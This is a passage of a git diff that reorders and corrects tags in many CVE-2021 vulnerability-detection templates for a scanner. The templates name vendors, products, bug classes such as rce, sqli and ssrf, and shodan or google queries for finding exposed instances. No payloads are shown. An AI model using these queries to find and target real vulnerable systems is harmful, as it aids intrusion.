b/http/cves/2021/CVE-2021-26812.yaml index 03387353fa..63428d4a13 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -25,7 +25,7 @@ info: vendor: jitsi product: meet framework: moodle - tags: cve,cve2021,moodle,jitsi,xss,plugin + tags: cve2021,cve,moodle,jitsi,xss,plugin http: - method: GET diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 0cdbd6698e..68833826ff 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -27,7 +27,7 @@ info: vendor: microsoft product: exchange_server shodan-query: vuln:CVE-2021-26855 - tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev + tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 98eeddd419..b6a0121d5f 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 3852e6ca8b..81368b91c0 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: sercomm product: agcombo_vd625_firmware - tags: cve,cve2021,crlf,injection,sercomm + tags: cve2021,cve,crlf,injection,sercomm,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 6c4ecc0816..7cfccb856b 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: csphere product: clansphere - tags: cve,cve2021,clansphere,xss,cms,unauth,csphere + tags: cve2021,cve,clansphere,xss,cms,unauth,csphere http: - method: GET diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 20725cc620..1edba5c543 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: csphere product: clansphere - tags: xss,cve,cve2021,clansphere,csphere + tags: cve2021,cve,xss,clansphere,csphere http: - method: GET diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 0b220fd078..577233066c 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 2d6e57ea30..ac6a17cf2f 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 3508a942a3..86d1dc92be 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 1212f12465..22eb106a43 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system,doctor_appointment_system_project + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 92be1a6282..2294a06ebe 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index b6e9883025..1f066097de 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -29,7 +29,7 @@ info: vendor: triconsole product: datepicker_calendar google-query: intitle:TriConsole.com - PHP Calendar Date Picker - tags: xss,edb,cve,cve2021,triconsole + tags: cve2021,cve,xss,edb,triconsole http: - method: GET diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 2ee9310909..611f3e9ec4 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -28,7 +28,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: cve,cve2021,grafana,unauth + tags: cve2021,cve,grafana,unauth http: - raw: diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index c1cd578062..75c155ee72 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -29,7 +29,7 @@ info: vendor: fudforum product: fudforum shodan-query: 'http.html:"Powered by: FUDforum"' - tags: xss,fudforum,edb,packetstorm,cve,cve2021 + tags: cve2021,cve,xss,fudforum,edb,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 061740b7e1..2bf8beb336 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -29,7 +29,7 @@ info: vendor: fudforum product: fudforum shodan-query: html:"FUDforum" - tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive,fudforum + tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: - method: GET diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 4fc550b1df..d873903466 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: yealink product: device_management - tags: cve,cve2021,rce,yealink,mirai,kev + tags: cve2021,cve,rce,yealink,mirai,kev http: - method: GET diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 6513fb4331..cb9e593009 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: pega product: infinity - tags: cve,cve2021,pega,auth-bypass + tags: cve2021,cve,pega,auth-bypass http: - method: GET diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index f1b2b50e8c..7dd7f8c114 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -26,7 +26,7 @@ info: vendor: appspace product: appspace shodan-query: title:"Appspace" - tags: cve,cve2023,appspace,ssrf + tags: cve,cve2021,appspace,ssrf http: - method: GET diff --git a/http/cves/2021/CVE-2021-27748.yaml b/http/cves/2021/CVE-2021-27748.yaml index b123a584c7..84fadd23ba 100644 --- a/http/cves/2021/CVE-2021-27748.yaml +++ b/http/cves/2021/CVE-2021-27748.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 2 shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2021,hcl,ibm,ssrf,websphere + tags: cve2021,cve,hcl,ibm,ssrf,websphere http: - method: GET diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index c439ef861d..63c2750790 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: apache product: solr - tags: cve,cve2021,apache,solr,ssrf + tags: cve2021,cve,apache,solr,ssrf http: - raw: diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index e23ef1650e..6b0d649380 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -26,7 +26,7 @@ info: vendor: acquia product: mautic shodan-query: title:"Mautic" - tags: cve,cve2021,mautic,xss,acquia + tags: cve2021,cve,mautic,xss,acquia http: - method: GET diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index a49d8b642b..a2cdc8113a 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: lumis product: lumis_experience_platform - tags: cve,cve2021,lumis,xxe,oast,blind + tags: cve2021,cve,lumis,xxe,oast,blind http: - raw: diff --git a/http/cves/2021/CVE-2021-28073.yaml b/http/cves/2021/CVE-2021-28073.yaml index d7bb53e2e2..9da20c9cce 100644 --- a/http/cves/2021/CVE-2021-28073.yaml +++ b/http/cves/2021/CVE-2021-28073.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-28073 metadata: max-request: 2 - tags: ntopng,cve,cve2021 + tags: cve2021,cve,ntopng http: - method: GET diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index c48337bd2e..3de868f655 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve,cve2021,hongdian,traversal + tags: cve2021,cve,hongdian,traversal http: - raw: diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index fe1e46e957..ce5e3ff21e 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve,cve2021,hongdian,exposure + tags: cve2021,cve,hongdian,exposure http: - raw: diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 55540a1df3..a7d22cdc93 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: hongdian product: h8922_firmware - tags: cve,cve2021,hongdian,rce,injection + tags: cve2021,cve,hongdian,rce,injection http: - raw: diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 5f8c879c09..486b8aa6be 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -28,8 +28,7 @@ info: max-request: 2 vendor: eclipse product: jetty - tags: packetstorm,vulhub,cve,cve2021,jetty,exposure,eclipse -flow: http(1) && http(2) + tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse http: - method: GET diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 0d02c8fcd4..a7e8357b97 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: eclipse product: jetty - tags: cve,cve2021,jetty,eclipse + tags: cve2021,cve,jetty,eclipse http: - method: GET diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 9f55baae4e..71fb768847 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -25,7 +25,7 @@ info: vendor: chronoengine product: chronoforums framework: joomla - tags: cve,cve2021,chronoforums,lfi,joomla,chronoengine + tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine http: - method: GET diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index f72cadac7c..d8025e0e49 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: seopanel product: seo_panel - tags: cve,cve2021,sqli,seopanel,auth,packetstorm + tags: cve2021,cve,sqli,seopanel,auth,packetstorm http: - raw: diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index e6ba9a798e..f23147009d 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2021-28854 metadata: max-request: 1 - tags: cve,cve2021 + tags: cve2021,cve,sqli http: - method: GET diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 6126824d75..e8dfe9bd24 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -28,7 +28,7 @@ info: vendor: netmask_project product: netmask framework: node.js - tags: cve,cve2021,npm,netmask,ssrf,lfi,netmask_project,node.js + tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js http: - method: GET diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 51b9d11ea8..d7df04f1f2 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: acexy product: wireless-n_wifi_repeater_firmware - tags: cve,cve2021,acexy,disclosure,iot + tags: cve2021,cve,acexy,disclosure,iot http: - method: GET diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index a1089dbd75..87be9359e9 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2021,rconfig,authenticated,lfi + tags: cve2021,cve,rconfig,authenticated,lfi http: - raw: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index e45540813c..fbab5cb20d 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -25,7 +25,7 @@ info: vendor: forgerock product: openam shodan-query: http.title:"OpenAM" - tags: cve,cve2021,openam,ldap,injection,forgerock + tags: cve2021,cve,openam,ldap,injection,forgerock http: - method: GET diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index e11d376ac5..fce4143a21 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -24,7 +24,7 @@ info: product: ofbiz shodan-query: html:"OFBiz" fofa-query: app="Apache_OFBiz" - tags: cve,cve2021,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce http: - raw: diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 13403bdfb3..07289cd330 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: hp product: edgeline_infrastructure_manager - tags: hpe,cve,cve2021,bypass,tenable,hp + tags: cve2021,cve,hpe,bypass,tenable,hp http: - raw: diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 6f716582d3..80f4ac6719 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -33,7 +33,7 @@ info: max-request: 2 vendor: alibaba product: nacos - tags: nacos,auth-bypass,cve,cve2021,alibaba + tags: cve2021,cve,nacos,auth-bypass,alibaba http: - raw: diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index f14f9d1edf..7f6016432b 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: alibaba product: nacos - tags: nacos,auth-bypass,cve,cve2021,alibaba + tags: cve2021,cve,nacos,auth-bypass,alibaba http: - method: GET diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 711f4ef84f..1e05ef3bd9 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -26,7 +26,7 @@ info: vendor: ghost product: ghost framework: node.js - tags: cve,cve2021,xss,ghost,node.js + tags: cve2021,cve,xss,ghost,node.js http: - method: GET diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index ac2146db3b..41c1c252fb 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce,xstream_project + tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project http: - raw: diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index f7b5a2fc1d..915ea71d32 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: prometheus product: prometheus - tags: cve,cve2021,prometheus,redirect + tags: cve2021,cve,prometheus,redirect http: - method: GET diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 84d12d8b23..cfd6b4b7a6 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: adminer product: adminer - tags: cve,cve2021,adminer,xss + tags: cve2021,cve,adminer,xss,sqli http: - method: GET diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 651fe6842c..20da86c95a 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: "seopanel" product: seo_panel - tags: cve,cve2021,seopanel,xss + tags: cve2021,cve,seopanel,xss http: - raw: diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 2a1238a4e5..85b2034cae 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: sysaid product: sysaid - tags: cve,cve2021,xss,sysaid + tags: cve2021,cve,xss,sysaid http: - method: GET diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 8033eb54c0..861a7ae9f9 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: ofbiz fofa-query: app="Apache_OFBiz" - tags: cve,cve2021,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce http: - raw: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 66c52c1920..436cb27178 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -27,7 +27,7 @@ info: vendor: php_curl_class_project product: php_curl_class google-query: inurl:"/php-curl-test/post_file_path_upload.php" - tags: cve,cve2021,xss,php-mod,wpscan,php_curl_class_project + tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index e4e982ff8d..563b213326 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -27,7 +27,7 @@ info: vendor: contribsys product: sidekiq shodan-query: title:"Sidekiq" - tags: cve,cve2021,xss,sidekiq,authenticated,contribsys + tags: cve2021,cve,xss,sidekiq,authenticated,contribsys http: - raw: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index 79f59fd4bd..9a282bb34f 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: intelbras product: win_300_firmware - tags: cve,cve2021,exposure,router,intelbras + tags: cve2021,cve,exposure,router,intelbras http: - method: GET diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index c8dd814852..b5771a9610 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zerof product: web_server - tags: cve,cve2021,zerof,sqli + tags: cve2021,cve,zerof,sqli http: - raw: diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 03efdbf633..de4409eb36 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: lanproxy_project product: lanproxy - tags: cve,cve2021,lanproxy,lfi,lanproxy_project + tags: cve2021,cve,lanproxy,lfi,lanproxy_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 11f2357272..44b7b63f7d 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: eng product: knowage - tags: cve,cve2021,xss,knowage,eng + tags: cve2021,cve,xss,knowage,eng http: - method: GET diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 79637b672c..eca7ec1ae7 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -27,7 +27,7 @@ info: vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" - tags: cve,cve2021,rce,voipmonitor + tags: cve2021,cve,rce,voipmonitor http: - raw: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index e823d1d3b9..9624b7d4a4 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -27,7 +27,7 @@ info: vendor: ivanti product: avalanche framework: windows - tags: cve,cve2021,avalanche,traversal,lfi,ivanti,windows + tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows http: - method: GET diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index b3ece52f13..9f1ce47da0 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -27,7 +27,7 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" - tags: microsoft,exchange,owa,xss + tags: cve2021,cve,microsoft,exchange,owa,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index e2222896ad..7e00b8468c 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chiyu-tech product: bf-430_firmware - tags: cve,cve2021,chiyu,crlf,iot,chiyu-tech + tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech http: - method: GET diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 6ae2efc722..8c844dda2e 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chiyu-tech product: bf-430_firmware - tags: cve,cve2021,chiyu,xss,iot,intrusive,chiyu-tech + tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech http: - method: GET diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index c36d14bfcc..2a550e68ca 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -26,7 +26,7 @@ info: vendor: facade product: ignition framework: laravel - tags: cve,cve2021,laravel,rce,vulhub,kev,facade + tags: cve2021,cve,laravel,rce,vulhub,kev,facade http: - raw: diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index bea93f39fd..fdb7898681 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: sisinformatik product: sis-rewe_go - tags: cve,cve2021,xss,seclists,intrusive,sisinformatik + tags: cve2021,cve,xss,seclists,intrusive,sisinformatik http: - method: GET diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index a2f0244f3e..e5b6ca869e 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -29,7 +29,7 @@ info: product: appliance_base_software shodan-query: 'set-cookie: nsbase_session' google-query: '"BeyondTrust" "Redistribution Prohibited"' - tags: xss,packetstorm,cve,cve2021,beyondtrust,bomgar + tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar http: - method: GET diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 3a97cf4665..d0693b2071 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -28,7 +28,7 @@ info: vendor: hitachi product: vantara_pentaho shodan-query: Pentaho - tags: spring,seclists,cve,cve2021,pentaho,auth-bypass,hitachi + tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi http: - method: GET diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 767d74446f..4900f8d786 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -27,7 +27,7 @@ info: vendor: automatedlogic product: webctrl shodan-query: html:"/_common/lvl5/dologin.jsp" - tags: cve,cve2021,webctrl,xss,packetstorm,automatedlogic + tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic http: - method: GET diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index fa6a7d1fa4..41856a1138 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tenda product: ac11_firmware - tags: cve,cve2021,tenda,rce,oast,router,mirai,kev + tags: cve2021,cve,tenda,rce,oast,router,mirai,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 961a9cee82..89398e2cc4 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: apache product: struts - tags: cve,cve2021,apache,rce,struts,struts2,intrusive + tags: cve2021,cve,apache,rce,struts,struts2,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 6b47775a9f..abaeac5f45 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: layer5 product: meshery - tags: sqli,cve,cve2021,layer5 + tags: cve2021,cve,sqli,layer5 variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index def4f41a73..c004833754 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: sysaid product: sysaid - tags: cve,cve2021,xss,sysaid + tags: cve2021,cve,xss,sysaid http: - method: GET diff --git 